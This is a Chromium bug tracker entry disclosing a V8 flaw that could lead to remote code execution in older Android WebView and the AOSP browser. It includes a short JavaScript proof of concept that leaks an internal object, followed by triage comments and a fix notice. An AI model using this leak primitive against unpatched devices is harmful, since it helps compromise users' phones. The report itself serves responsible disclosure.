Issue metadata
Security: v8 bug leads to RCE in AOSP browser or WebView on Android 4.4, 5.0, 5.1
Reported by higonggu...@gmail.com, Aug 23 2016
Issue description
VERSION
This is a V8 bug, and it affects V8 versions 3.20 to 4.2. As the AOSP browser and WebView in Android use an old Blink kernel, I think it should be fixed.
Chrome Version: [37.0.2062.117] + [stable]
Operating System: Android 4.4,5.0,5.1
REPRODUCTION CASE
kMessages is observable, which leads to an exception that can be controlled to leak an InternalArray.
The code to leak kMessages is as follows:
<script>
var kMessages;
// Install a getter on Object.prototype for a key the runtime reads off kMessages;
// when the lookup falls through to the prototype chain, `this` is kMessages itself.
Object.prototype.__defineGetter__("observe_accept_invalid", function () { kMessages = this; });
// Passing an invalid accept argument makes the runtime build the error message.
try { Object.observe({}, function () {}, 1); } catch (e) {}
delete Object.prototype["observe_accept_invalid"];
alert(kMessages);
</script>
The full exploit for Chrome 37 is attached too.
Aug 23 2016 (ClusterFuzz):
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5726907608072192
Aug 23 2016:
Chrome version used is really old, please use latest version. Also, unable to reproduce.
Aug 24 2016:
I think you haven't understood this issue; it affects Android WebView on Android 4.4, 5.0, and 5.1, and these systems are still in maintenance.
Aug 24 2016:
Please involve an engineer from the Android security team; they'll know what I'm talking about.
Aug 24 2016:
+cc folks from Android Security to create tracking bug if needed. I don't think webview is getting updates on older releases.
Aug 31 2016:
AndroidID-31217937 logged to review this for Android.
Sep 26 2016:
Note, Android is issuing a fix for this.
Nov 30 2016:
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot